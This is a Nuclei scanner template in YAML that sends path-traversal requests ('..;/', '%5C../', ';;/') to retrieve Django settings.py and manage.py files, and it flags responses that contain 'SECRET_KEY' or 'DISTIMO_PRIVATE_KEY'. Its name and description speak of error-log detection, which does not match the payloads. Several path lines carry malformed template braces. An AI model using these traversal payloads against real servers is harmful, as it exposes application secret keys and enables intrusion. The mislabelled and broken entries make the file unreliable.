id: ngix_projeto_mobs

info:
  name: Error Log Files Detect
  author: Redflare-Cyber_
  severity: medium
  description: Error log files were exposed, enhanced from official nuclei templates with added paths and matchers.
  metadata:
    max-request: 29
    shodan-query: html:"error.log"
  tags: nginx

http:
  - method: GET
    path:

      - "{{BaseURL}}/..;/mobs/settings.py"
      - "{{BaseURL}}/../mobs/settings.py"
      - "{{BaseURL}}/%5C../mobs/settings.py"
      - "{{BaseURL}}/;;/mobs/settings.py"
      - "{{BaseURL}}/..;/manage.py"
      - "{{BaseURL}}/../manage.py"
      - "{{BaseURL}}/%5C../manage.py"
      - "{{BaseURL}}/;;/manage.py"
      - "{{BaseURL}..;/mobs/settings.py"
      - "{{BaseURL}../mobs/settings.py"
      - "{{BaseURL}%5C../mobs/settings.py"
      - "{{BaseURL};;/mobs/settings.py"
      - "{{BaseURL}..;/manage.py"
      - "{{BaseURL}../manage.py"
      - "{{BaseURL}%5C../manage.py"
      - "{{BaseURL}};;/manage.py"      
      
     
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'SECRET_KEY'
          - 'DISTIMO_PRIVATE_KEY'


        condition: or

      - type: status
        status:
          - 200